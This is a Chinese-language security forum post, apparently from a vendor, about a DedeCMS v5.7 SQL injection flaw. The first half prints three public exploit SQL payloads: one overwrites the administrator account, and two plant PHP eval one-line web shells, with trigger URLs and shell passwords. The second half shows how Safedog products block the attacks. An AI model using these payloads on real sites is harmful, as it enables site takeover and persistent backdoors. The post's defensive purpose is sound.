利用安全狗防护DedeCMS v5.7高危注入漏洞
[p=30, 2, left][color=#444444][font=Tahoma,] 首先我们一起来了解下[font=Times New Roman]DedeCMS v5.7[/font]漏洞情况:[/font][/color][/p][font=Tahoma,][color=#000000][font=Times New Roman] 1[/font][font=宋体]、漏洞描述[/font][/color][/font]
[p=30, 2, left][color=#444444][font=Tahoma,][color=#000000] 漏洞所在版本:[font=Times New Roman]DedeCMS v5.7[/font][/color][/font][/color][/p]
[p=30, 2, left][color=#444444][font=Tahoma,][color=#000000] 漏洞发布时间:[font=Times New Roman]2013[/font]年[font=Times New Roman]06[/font]月[font=Times New Roman]07[/font]日[/color][/font][/color][/p]
[p=30, 2, left][color=#444444][font=Tahoma,][color=#000000] 漏洞修复版本:[font=Times New Roman]DedeCMS v5.7 20130607[/font]之后版本[/color][/font][/color][/p]
[p=30, 2, left][color=#444444][font=Tahoma,][color=#000000] 漏洞触发条件:确保[font=Times New Roman]php.ini[/font]中使用[font=Times New Roman]php_mysql.dll[/font]同时未开启[font=Times New Roman]php_mysqli.dll[/font]。[/color][/font][/color][/p]
[p=30, 2, left][color=#444444][font=Tahoma,][color=#000000] 漏洞触发根源:在于[font=Times New Roman]/include/dedesql.class.php[/font][/color][color=#000000]文件中程序[/color]未初始化[font=Times New Roman]$arrs1[/font]和[font=Times New Roman]$arrs2[/font][color=#000000]这两个数组,结合程序不安全的参数处理机制,导致我们能够覆盖程序中任意全局变量。因此我们可通过控制全局变量[font=Times New Roman]$GLOBALS['cfg_dbprefix'][/font]的值,进而通过[font=Times New Roman]$prefix[/font]值和[font=Times New Roman]/plus/download.php[/font]中的[font=Times New Roman]SQL[/font]语句构造,从而造成了此[font=Times New Roman]SQL[/font]注入漏洞。[/color][/font][/color][/p]
[p=30, 2, left][color=#444444][font=Tahoma,][color=#000000] 由于[font=Times New Roman]DedeCMS[/font]使用广泛,而此高危注入漏洞利用方便,并且能够因此远程获取到管理后台管理员,或者可[font=Times New Roman]getshell[/font]获取到系统的控制权。网上已公开的有以下[font=Times New Roman]3[/font]种[font=Times New Roman]EXP[/font]:[/color][/font][/color][/p]
[font=Tahoma,][color=#000000][font=Arial] 1.1[/font][font=黑体]修改后台管理员[/font][/color][/font]
[p=30, 2, left][color=#444444][font=Tahoma,][color=#000000] ([font=Times New Roman]1[/font])如:构造如下注入[font=Times New Roman]SQL[/font]语句:[/color][/font][/color][/p][p=30, 2, left][color=#444444][font=Tahoma,][color=#000000]cfg_dbprefixadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1[/color][/font][/color][/p][p=30, 2, left][color=#444444][font=Tahoma,][color=#000000][font=Times New Roman]#[/font]修改后台管理员为:用户名[font=Times New Roman]spider[/font],密码[font=Times New Roman]admin[/font]。[/color][/font][/color][/p]
[p=30, 2, left][color=#444444][font=Tahoma,][color=#000000][font=Times New Roman] (2)[/font]对应的[font=Times New Roman]EXP:[/font][/color][/font][/color][/p][p=30, 2, center][color=#444444][font=Tahoma,][color=#000000][font=Times New Roman][img=530,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/104400icqdcwebywzb4500.jpg[/img]
[/font][/color][/font][/color][/p]
[color=#000000][font=Tahoma,][size=12pt][font=Times New Roman][p=30, 2, left] (3)执行EXP后,相应后台数据库表变为如下:[/p][p=30, 2, center][img=551,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/104401ig1xn4nxiqzna1fq.jpg[/img]
[/p]
[p=30, 2, left][color=#000000] ([font=Times New Roman]4[/font])因此相应后台登录用户变为[font=Times New Roman]spider[/font]密码[font=Times New Roman]admin[/font][/color][/p]
[color=#000000][font=Arial] 1.2[/font]通过[font=Arial]/plus/mytag_js.php[/font]文件生成一句话木马[font=Arial]php[/font][/color]
[p=30, 2, left] ([font=Times New Roman]1[/font])如:构造如下注入[font=Times New Roman]SQL[/font]语句:[/p]
[p=30, 2, left][color=#000000]cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''mybak.php'',''<?php eval($_POST[mybak]);?>'');{/dede:php}') # @`\'`[/color][/p]
[p=30, 2, left][color=#000000][font=Times New Roman] (2)[/font]对应的[font=Times New Roman]EXP:[/font][/color][/p][p=30, 2, center][img=530,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/104405zudd73mm3di742um.jpg[/img]
[/p]
[p=30, 2, left] (3)执行EXP后,将向数据库表dede_mytag中插入一条记录,如图:[/p][p=30, 2, center][img=600,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/104407xheliekivhjzoa5v.jpg[/img]
[/p]
[p=30, 2, left] ([font=Times New Roman]4[/font])执行如下语句,在[font=Times New Roman]/plus[/font]目录下生成[font=Times New Roman]mybak.php[/font]一句话木马[/p][p=30, 2, left][url=http://www.test.com/dedecms5.7/plus/mytag_js.php?aid=9013]http://www.test.com/dedecms5.7/plus/mytag_js.php?aid=9013[/url][/p]
[p=30, 2, left][font=Times New Roman] (5)[/font]使用菜刀工具进行连接[/p][p=30, 2, left]http://www.test.com/dedecms5.7/plus/mybak.php 密码:mybak[/p]
[font=Arial] 1.3[/font]使[font=Arial]/plus/ad_js.php[/font]文件变为一句话木马[font=Arial]php[/font]
[p=30, 2, left] ([font=Times New Roman]1[/font])如:构造如下注入[font=Times New Roman]SQL[/font]语句:[/p][p=30, 2, left]cfg_dbprefixmyad` SET `normbody` = '<?php eval($_POST[m]);?>' WHERE `aid` =1 #[/p]
[p=30, 2, left][font=Times New Roman] (2)[/font]对应的[font=Times New Roman]EXP:[/font][/p][p=30, 2, center][img=526,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/104410go3hoiuqzhqetqew.jpg[/img]
[/p]
[p=30, 2, left] (3)执行EXP后,将向数据库表dede_myad中插入一条记录,如图;[/p][p=30, 2, center][img=560,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/104413d3jgiidaqxw7s3gg.jpg[/img]
[/p]
[p=30, 2, left] ([font=Times New Roman]4[/font])使用菜刀工具进行连接[/p][p=30, 2, left][color=#000000]http://www.test.com/dedecms5.7/plus/ad_js.php?aid=1 密码:m[/color][/p][p=30, 2, center][img=574,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/104354tpna9cf3ekhf3a19.jpg[/img]
[/p]
[p=30, 2, left][color=blue] 那要怎样防范这种高危注入漏洞呢?下面我们一起来看看解决方法:[/color][/p]
[font=Times New Roman] 2、[/font]使用安全狗软件防护该漏洞
[p=30, 2, left] 由于攻击者可能通过该漏洞进行各种恶意攻击,并因此对网站造成较大的风险危害。为最大程度减少这种可能性,用户可使用安全狗软件对网站进行了以下全方位的防护。[/p]
[font=Arial] 2.1[/font]网站安全狗[font=Arial]--[/font]网站漏洞[font=Arial]EXP[/font]规则防护
[p=30, 2, left] ([font=Times New Roman]1[/font])安装网站安全狗[font=Times New Roman]3.0[/font]版本,安装完成后,打开网站安全狗界面并修改网站保护级别为:[color=red]高级[/color](即开启所有防护),如下图:[/p]
[p=30, 2, center][img=559,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/105415exap1rxsrqs91tqi.jpg[/img]
[/p]
[p=30, 2, left] (2)切换界面:主动防御—SQL注入防护,查看规则列表中是否有相应“Dedecms5.7版本exp注入漏洞”防护规则。[/p][p=30, 2, center][img=549,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/105538ad207mh1dq9s0bd7.jpg[/img]
[/p]
[p=30, 2, left][color=#000000] 若无,[/color]可点击如下图所示“在线更新防护规则”按钮,然后点击“保存”按钮完成更新防护规则列表[color=#000000]。[/color]如下图所示:[/p][p=30, 2, center][img=552,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/105421s435itxsy48sqfis.jpg[/img]
[/p]
[p=30, 2, left][font=Times New Roman] (3)[/font]在完成以上操作后,我们打开浏览器输入[font=Times New Roman]DedeCMS 5.7[/font]注入漏洞[font=Times New Roman]EXP[/font],出现下图内容,这也说明该攻击已被网站安全狗拦截。[/p][p=30, 2, center][img=508,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/105424k335jnwntpm37nf3.jpg[/img]
[/p]
[font=Arial] 2.2[/font]网站安全狗[font=Arial]--[/font]一句话木马防护
[p=30, 2, left] 若是在使用网站安全狗进行防护之前,网站已被植入一句话木马;或者攻击者可能绕过前面的网站漏洞[font=Times New Roman]EXP[/font]规则防护,向网站植入了一句话木马。此时可以使用网站安全狗的[color=red]第二重防护[/color]:一句话木马防护,通过拦截菜刀等工具连接和命令执行,来阻止攻击行为。具体如下:[/p]
[p=30, 2, left] ([font=Times New Roman]1[/font])打开网站安全狗界面,确认当前网站保护级别为:高级(即开启所有防护),如下图:[/p][p=30, 2, center][img=553,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/105355p2iijuwzpyjijivj.jpg[/img]
[/p]
[p=30, 2, left][color=#000000][font=Times New Roman] (2)[/font]切换到主动防御界面,点击“在线更新防护规则”确认防护规则为最新版本。使用菜刀工具连接一句话木马,出现如下图画面,可见菜刀工具的连接已被网站安全狗拦截防护。[/color][/p][p=30, 2, center][img=553,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/105357hpp42a30rha7rrc0.jpg[/img]
[/p]
[p=30, 2, left][color=#000000][font=Times New Roman] (3)[/font]若是攻击者绕过了菜刀工具连接防护,则网站安全狗将继续对菜刀工具的命令执行行为进行拦截阻止。[/color][/p][p=30, 2, left][color=#000000] 在菜刀工具操作界面,右击“更新缓存”命令,如下图:[/color][/p][p=30, 2, center][size=12pt] [/size][img=553,0]http://bbs.safedog.cn/data/attachment/forum/201309/09/165814xpmpphbs285dqd42.jpg[/img]
[/p]
[p=30, 2, center][size=12pt] [/size][/p]
[p=30, 2, left] 菜刀工具将出现如下界面,表明菜刀工具的命令执行已被网站安全狗拦截防护,以阻止攻击者的进一步操作。[/p]
[p=30, 2, center][size=12pt] [img=554,0]http://bbs.safedog.cn/data/attachment/forum/201309/09/165814bli4gmlvjlmbv88y.jpg[/img]
[/size][/p]
[font=Arial] 2.3[/font]利用服务器安全狗的文件目录保护功能阻止未知攻击
[p=30, 2, left] 如上可知,该[font=Times New Roman]Dedecms5.7[/font]注入漏洞有在网站目录下生成一句话木马的[font=Times New Roman]EXP[/font],针对该情况,用户也可用服务器安全狗的文件目录保护功能对该类型[font=Times New Roman]EXP[/font]进行防护。[/p]
[p=30, 2, left][font=Times New Roman] (1)[/font]安装服务器安全狗,安装完成后,打开服务器安全狗界面,通过服务器安全狗[font=Times New Roman]-[/font]主动防御[font=Times New Roman]-[/font]文件及目录保护[font=Times New Roman]-[/font]网站保护规则,手动新增规则:“[font=Times New Roman]Dedecms5.7[/font]版本系统[font=Times New Roman]exp[/font]规则”,将监控目录设置为[font=Times New Roman]DedeCMS[/font]网站站点的目录,并勾选禁止写入、禁止创建,如下图:[/p][p=30, 2, center][img=327,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/105407mfpfp3lz0ddcdkyk.jpg[/img]
[/p]
[p=30, 2, left][font=Times New Roman] (2)[/font]文件(夹)名包含的字符设置为:[font=Times New Roman]*[/font],文件扩展名规则设置为:[font=Times New Roman]php|asp|aspx|asa|asax|ascx|ashx|asmx|cdx|cer|cgi|jsp[/font],如下图:[/p][p=30, 2, center][img=333,0]http://bbs.safedog.cn/data/attachment/forum/201309/05/105409xizrornz0pioi6oi.jpg[/img]
[/p]
[p=30, 2, left][color=#000000][font=Times New Roman] (3)[/font]通过以上规则设置后,在网站被攻击者使用以下漏洞[font=Times New Roman]EXP[/font]类型时,[/color][/p][p=30, 2, left][color=#000000][font=Times New Roman][url=http://www.test.com/dedecms5.7/plus/mytag_js.php?aid=9013]http://www.test.com/dedecms5.7/plus/mytag_js.php?aid=9013[/url][/font], [/color][color=#000000]服务器安全狗就可直接拦截,避免攻击者在网站[font=Times New Roman]/plus[/font]目录下生成[font=Times New Roman]*.php[/font]、[font=Times New Roman]*.asp[/font]、[font=Times New Roman]*.aspx[/font]、[font=Times New Roman]*.asa[/font]、[font=Times New Roman]*.asax[/font]、[font=Times New Roman]*.ascx[/font]、[font=Times New Roman]*.ashx[/font]、[font=Times New Roman]*.asmx[/font]、[font=Times New Roman]*.cdx[/font]、[font=Times New Roman]*.cer[/font]、[font=Times New Roman]*.cgi[/font]、[font=Times New Roman]*.jsp[/font]等类型的一句话木马文件,从而避免被进一步通过菜刀等工具获取到系统控制权。[/color]
[color=red][size=12pt] 点击下载规则: [/size][/color][img]http://bbs.safedog.cn/static/image/filetype/rar.gif[/img]
[url=http://bbs.safedog.cn/forum.php?mod=attachment&aid=NjMwOXwzMmU5Y2QzMnwxMzg2NDI2NDMyfDB8NTIyNjQ%3D]禁止在Dedecms目录下创建非法文件.rar[/url][/p]
[p=30, 2, left][color=#000000] 备注:快速添加以上防护规则:直接使用服务器安全狗[font=Times New Roman]--[/font]主动防御[font=Times New Roman]--[/font]文件及目录保护界面的“导入规则”功能导入下载的[font=Times New Roman]xml[/font]文件格式规则,并点击修改导入的规则.[/color][color=#ff0000](注意把规则中的保护目录换成您自己网站的目录)[/color][/p][/font][/size][/font][/color]
页:
[1]